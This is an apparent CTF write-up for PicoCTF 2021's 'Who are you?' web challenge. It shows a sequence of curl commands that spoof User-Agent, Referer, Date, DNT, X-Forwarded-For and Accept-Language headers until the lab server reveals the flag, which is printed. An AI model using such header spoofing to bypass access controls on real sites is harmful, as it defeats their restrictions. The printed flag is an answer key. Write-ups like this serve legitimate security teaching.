PicoCTF-2021 Writeup
  • README
  • Binary Exploitation
    • Binary Gauntlet 0
    • Binary Gauntlet 1
    • Stonks
    • What's your input?
  • Cryptography
    • Compress and Attack
    • Dachshund Attacks
    • Double DES
    • Easy Peasy
    • It is my Birthday 2
    • It's Not My Fault 1
    • Mini RSA
    • New Caesar
    • New Vignere
    • No Padding, No Problem
    • Pixelated
    • Play Nice
    • Scrambled: RSA
  • Forensics
    • Disk, disk, sleuth!
    • Disk, disk, sleuth! II
    • information
    • MacroHard WeakEdge
    • Matryoshka doll
    • Milkslap
    • Surfing the Waves
    • Trivial Flag Transfer Protocol
    • tunn3l v1s10n
    • Very very very Hidden
    • Weird File
    • Wireshark doo dooo do doo...
    • Wireshark twoo twooo two twoo...
  • Reverse Engineering
    • ARMssembly 0
    • ARMssembly 2
    • ARMssembly 3
    • ARMssembly 4
    • gogo
    • Hurry up! Wait!
    • keygenme-py
    • Let's get dynamic
    • Rolling My Own
    • Shop
    • speeds and feeds
    • Transformation
  • Web Exploitation
    • Ancient History
    • Bithug
    • GET aHEAD
    • It is my Birthday
    • More Cookies
    • Most Cookies
    • Scavenger Hunt
    • Some Assembly Required 1
    • Some Assembly Required 2
    • Some Assembly Required 3
    • Some Assembly Required 4
    • Super Serial
    • Web Gauntlet 2
    • Web Gauntlet 3
    • Who are you?
    • X marks the spot
Powered by GitBook
On this page
  • Problem
  • Solution
  • Flag

Was this helpful?

Edit on GitHub
  1. Web Exploitation

Who are you?

PreviousWeb Gauntlet 3NextX marks the spot

Last updated 2 years ago

Was this helpful?

Problem

Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn

Solution

  1. Resources: / / /

  2. curl http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> Only people who use the official PicoBrowser are allowed on this site!

  3. curl --user-agent "picobrowser" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> I don&#39;t trust users visiting from another site.

  4. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> Sorry, this site only worked in 2018.

  5. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> I don&#39;t trust users who can be tracked.

  6. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> This website is only for people from Sweden.

  7. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> You&#39;re in Sweden but you don&#39;t speak Swedish?

  8. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> What can I say except, you are welcome

  9. Final command: curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep "<b>.*</b>" --> picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}

Flag

picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}

http://mercury.picoctf.net:38322/
HTTP RFC
MDN HTTP Headers
Language Code Table
Sweden IP Address Ranged